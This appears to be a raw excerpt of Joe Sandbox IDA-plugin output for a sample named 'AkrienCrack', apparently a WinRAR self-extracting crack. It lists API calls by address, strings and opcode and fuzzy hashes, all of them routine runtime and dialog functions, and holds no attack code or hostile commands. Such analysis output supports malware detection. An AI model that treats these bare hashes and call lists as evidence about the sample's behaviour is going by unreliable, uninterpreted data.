              • API String ID: 3286310052-4209811716
              • Opcode ID: a0d644411c628b1a62dab8837fd369f8b7dfa39b78678499b0644dcbd07db642
              • Instruction ID: f1f447f23014c31865a2bd3d4b6a2bb7bfa0f42862484ceeb572f70230e7a21a
              • Opcode Fuzzy Hash: a0d644411c628b1a62dab8837fd369f8b7dfa39b78678499b0644dcbd07db642
              • Instruction Fuzzy Hash: 36313731548311ABD720AB249C06F6F77E8DF56722F0444DAFC16B71D1EF689A4D83A1
              APIs
              • ShowWindow.USER32(?,00000000), ref: 00B5964E
              • GetWindowRect.USER32(?,00000000), ref: 00B59693
              • ShowWindow.USER32(?,00000005,00000000), ref: 00B5972A
              • SetWindowTextW.USER32(?,00000000), ref: 00B59732
              • ShowWindow.USER32(00000000,00000005), ref: 00B59748
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Window$Show$RectText
              • String ID: RarHtmlClassName
              • API String ID: 3937224194-1658105358
              • Opcode ID: c6984186a4cbd1f0ae30b16e7384dcd2a99874585d0932072f28115e1a18d3f4
              • Instruction ID: 89ffce257d7183fab39993b8ffb65bd5a1e16a97103db2d7a943e63495a80b5e
              • Opcode Fuzzy Hash: c6984186a4cbd1f0ae30b16e7384dcd2a99874585d0932072f28115e1a18d3f4
              • Instruction Fuzzy Hash: 0031C131004200EFCB119F68DC8AB6B7BE8EF49702F0445DAFE49AA162DB34D949CB61
              APIs
                • Part of subcall function 00B6BF79: _free.LIBCMT ref: 00B6BFA2
              • _free.LIBCMT ref: 00B6C003
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B6C00E
              • _free.LIBCMT ref: 00B6C019
              • _free.LIBCMT ref: 00B6C06D
              • _free.LIBCMT ref: 00B6C078
              • _free.LIBCMT ref: 00B6C083
              • _free.LIBCMT ref: 00B6C08E
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction ID: eb029a3982930614de1742f9d3688c46bb1d164038d69b5c9ac74c88dd22e9d6
              • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
              • Instruction Fuzzy Hash: 80111271541B04F6E620BBB0DC47FCBB7ED6F04700F4089A5B299A6563DF6DF9448A90
              APIs
              • GetLastError.KERNEL32(?,?,00B620C1,00B5FB12), ref: 00B620D8
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B620E6
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B620FF
              • SetLastError.KERNEL32(00000000,?,00B620C1,00B5FB12), ref: 00B62151
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 2e68190555481fab7212b960a5a2d8218381f691bbfe906ecd614ae1e9090b00
              • Instruction ID: 3c1788a7a562ab034bf613449cb7e025b1529cadb7000f7265d7a10f6e30a714
              • Opcode Fuzzy Hash: 2e68190555481fab7212b960a5a2d8218381f691bbfe906ecd614ae1e9090b00
              • Instruction Fuzzy Hash: 1601FC3310DB116EB7543BB5FC855162BC4EF16B7872107E9F224761E1EF19CC419144
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID:
              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
              • API String ID: 0-1718035505
              • Opcode ID: b03499b34b2f64c32aa4c99537e32c6e4db91e2c5cde22d21f427f01203676ae
              • Instruction ID: 2a6ab117955f4361b2d6d51006b684618c62fdb4b22f310ce3af22a624c8ed35
              • Opcode Fuzzy Hash: b03499b34b2f64c32aa4c99537e32c6e4db91e2c5cde22d21f427f01203676ae
              • Instruction Fuzzy Hash: 730128316513226B4F306FB45C853E623E4EA4272372047FAED55E3350FE91C8C9E6A0
              APIs
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50D0D
                • Part of subcall function 00B4ACF5: GetVersionExW.KERNEL32(?), ref: 00B4AD1A
              • LocalFileTimeToFileTime.KERNEL32(?,00B50CB8), ref: 00B50D31
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B50D47
              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00B50D56
              • SystemTimeToFileTime.KERNEL32(?,00B50CB8), ref: 00B50D64
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B50D72
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion
              • String ID:
              • API String ID: 2092733347-0
              • Opcode ID: 565c360b3c7fb448abc7e832f0ff5112c6d9ce6321489f632e2715157db9ff89
              • Instruction ID: 5bb8f61a39594f69b5d313c08e866aefaeaa92e8a63f1e336fcf3e166ed7b089
              • Opcode Fuzzy Hash: 565c360b3c7fb448abc7e832f0ff5112c6d9ce6321489f632e2715157db9ff89
              • Instruction Fuzzy Hash: FA31C97990020AEBCB00DFE5D8859EFBBF8FF58701B04456AE955E3610EB309685CB65
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: c503ed5b1ac65140cccd534a17e3ebd366da26162d4e01f1758719ae65253519
              • Instruction ID: 024e134bffb03c5c057059015d4780e888ad410571cb17af118fbef2121a2a88
              • Opcode Fuzzy Hash: c503ed5b1ac65140cccd534a17e3ebd366da26162d4e01f1758719ae65253519
              • Instruction Fuzzy Hash: 8B217C7160420EFBD714AB10CC81F7AB7EDEB50786F10C1E8FC0E9A252E665ED499691
              APIs
              • GetLastError.KERNEL32(?,00B80EE8,00B63E14,00B80EE8,?,?,00B63713,00000050,?,00B80EE8,00000200), ref: 00B68FA9
              • _free.LIBCMT ref: 00B68FDC
              • _free.LIBCMT ref: 00B69004
              • SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B69011
              • SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B6901D
              • _abort.LIBCMT ref: 00B69023
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 5149cf29d319a6bab0e7e1ad4e49b4589d6f3dbeced443424e4ee542e4a62270
              • Instruction ID: 9028e98c6588d163f775b91ebb2aeea97115be4e05adf9ed9f14062d4a8cece1
              • Opcode Fuzzy Hash: 5149cf29d319a6bab0e7e1ad4e49b4589d6f3dbeced443424e4ee542e4a62270
              • Instruction Fuzzy Hash: 82F028355096106AC62233686C4AB2B29EADFD1760F2406E4F519E32A2EE2CCD416021
              APIs
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B5D2F2
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D30C
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D31D
              • TranslateMessage.USER32(?), ref: 00B5D327
              • DispatchMessageW.USER32(?), ref: 00B5D331
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00B5D33C
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
              • String ID:
              • API String ID: 2148572870-0
              • Opcode ID: b4641f36f9b6e61a8794d9c6fe1ca2b22f8903d0c69bfe13231ee535e8fccea0
              • Instruction ID: 112b6c44c323d1e1f0815f91504a5221d88909c87e8e918f54fbf1d835e7f8a2
              • Opcode Fuzzy Hash: b4641f36f9b6e61a8794d9c6fe1ca2b22f8903d0c69bfe13231ee535e8fccea0
              • Instruction Fuzzy Hash: F8F03C72A01129ABCB306BA5DC4DEDBBFADEF52792F008152FA06D3010DA348545C7A1
              APIs
              • _wcschr.LIBVCRUNTIME ref: 00B5C435
                • Part of subcall function 00B517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B4BB05,00000000,.exe,?,?,00000800,?,?,00B585DF,?), ref: 00B517C2
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CompareString_wcschr
              • String ID: <$HIDE$MAX$MIN
              • API String ID: 2548945186-3358265660
              • Opcode ID: cfc4e206425b1e866eb895daf7581005a978a9a57414e220c44f7542d0605546
              • Instruction ID: 376fb1e6dbf6b8efcd939ef134d96173a44c4e3fab315e14a1728ba0b3899619
              • Opcode Fuzzy Hash: cfc4e206425b1e866eb895daf7581005a978a9a57414e220c44f7542d0605546
              • Instruction Fuzzy Hash: F8318476900309AEDF21DA54CC51FEA7BFDEB14305F0044E6FD19A6151EBB09EC88A50
              APIs
              • LoadBitmapW.USER32(00000065), ref: 00B5ADFD
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00B5AE22
              • DeleteObject.GDI32(00000000), ref: 00B5AE54
              • DeleteObject.GDI32(00000000), ref: 00B5AE77
                • Part of subcall function 00B59E1C: FindResourceW.KERNEL32(00B5AE4D,PNG,?,?,?,00B5AE4D,00000066), ref: 00B59E2E
                • Part of subcall function 00B59E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E46
                • Part of subcall function 00B59E1C: LoadResource.KERNEL32(00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E59
                • Part of subcall function 00B59E1C: LockResource.KERNEL32(00000000,?,?,?,00B5AE4D,00000066), ref: 00B59E64
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
              • String ID: ]
              • API String ID: 142272564-3352871620
              • Opcode ID: 186f9b3109e3f1b5fbb1da3ea24591ae712adeb1865828d19ca925e8813441c8
              • Instruction ID: 5bc860882fe220ab0dabcb6e99ca2151a12df816b236b0e862d0a545a340399c
              • Opcode Fuzzy Hash: 186f9b3109e3f1b5fbb1da3ea24591ae712adeb1865828d19ca925e8813441c8
              • Instruction Fuzzy Hash: D001C032540215A7CB2167689C07B7FBBFAEB82B53F1902D5BD00B7291DE718C1D96A2
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • EndDialog.USER32(?,00000001), ref: 00B5CCDB
              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00B5CCF1
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B5CD05
              • SetDlgItemTextW.USER32(?,00000068), ref: 00B5CD14
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: RENAMEDLG
              • API String ID: 445417207-3299779563
              • Opcode ID: c434179e73ed2dd4730a977a6bce0d2210594fce7e5bbbf742a670c6e5e98ebd
              • Instruction ID: 44c27cbcea1fa15cacbb6d0035a881c176bd051b54fb0cb7074442863cd3b183
              • Opcode Fuzzy Hash: c434179e73ed2dd4730a977a6bce0d2210594fce7e5bbbf742a670c6e5e98ebd
              • Instruction Fuzzy Hash: C80128322843107EE5218F689D09F573FEEEB5A703F1004D1F745A70E0CBA5990987A5
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B67573,00000000,?,00B67513,00000000,00B7BAD8,0000000C,00B6766A,00000000,00000002), ref: 00B675E2
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B675F5
              • FreeLibrary.KERNEL32(00000000,?,?,?,00B67573,00000000,?,00B67513,00000000,00B7BAD8,0000000C,00B6766A,00000000,00000002), ref: 00B67618
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 1cf80c820034f5c2c3ef71217b8e81fdd08e16f3986824ab9d84149990575065
              • Instruction ID: 42f014db0343e69e9bb9215f5e362f09122b0540c1a7ffeb3ee4a9a9a4437ce3
              • Opcode Fuzzy Hash: 1cf80c820034f5c2c3ef71217b8e81fdd08e16f3986824ab9d84149990575065
              • Instruction Fuzzy Hash: A8F04430A54618BBDB159F54DC09BDDBFF9EF04B15F0040A8F809A7160DF749E84DA54
              APIs
                • Part of subcall function 00B50085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B500A0
                • Part of subcall function 00B50085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B4EB86,Crypt32.dll,00000000,00B4EC0A,?,?,00B4EBEC,?,?,?), ref: 00B500C2
              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B4EB92
              • GetProcAddress.KERNEL32(00B881C0,CryptUnprotectMemory), ref: 00B4EBA2
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AddressProc$DirectoryLibraryLoadSystem
              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
              • API String ID: 2141747552-1753850145
              • Opcode ID: 79ac72cbaa309cdef456d34cf468fd2d562aa0209675dacdbcb1859426f7e5e4
              • Instruction ID: c22521237912cf654c20e1ca8e2abd6fa0d6620418087a8147957ce4956b36bb
              • Opcode Fuzzy Hash: 79ac72cbaa309cdef456d34cf468fd2d562aa0209675dacdbcb1859426f7e5e4
              • Instruction Fuzzy Hash: 15E04F704047519ECB209F349858B42BAE4AF14B01B04C89DE5EAE3190DAB4D584AB50
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: b646ab4d1f492e4bf44ca693d752bf06a1c32c959582b9f62069621e1c944918
              • Instruction ID: 4dc455afb285405cf7a456607eee848e78fc8711b3ed7ca0ff943d84c7e6a1dc
              • Opcode Fuzzy Hash: b646ab4d1f492e4bf44ca693d752bf06a1c32c959582b9f62069621e1c944918
              • Instruction Fuzzy Hash: 8741C132A403049BDB24DF78C881A5EB7E6EF89718B1545E8E919EB341EB35ED05CB80
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 00B6B619
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B6B63C
                • Part of subcall function 00B68518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B6B662
              • _free.LIBCMT ref: 00B6B675
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B6B684
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: bb62312da0fea3511affe7bc730c1dbf877d4a18155a0a7972950fd65be9fa48
              • Instruction ID: ea15efcca1b56e22dd1181ae6b734bc8f37f3893a18db82519d1b92012fc3ea5
              • Opcode Fuzzy Hash: bb62312da0fea3511affe7bc730c1dbf877d4a18155a0a7972950fd65be9fa48
              • Instruction Fuzzy Hash: D7018472602215BF63211676AC9CC7BAAFDDEC6FA031502A9F905D3115DF688E8191B1
              APIs
              • GetLastError.KERNEL32(?,?,?,00B6895F,00B685FB,?,00B68FD3,00000001,00000364,?,00B63713,00000050,?,00B80EE8,00000200), ref: 00B6902E
              • _free.LIBCMT ref: 00B69063
              • _free.LIBCMT ref: 00B6908A
              • SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B69097
              • SetLastError.KERNEL32(00000000,?,00B80EE8,00000200), ref: 00B690A0
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
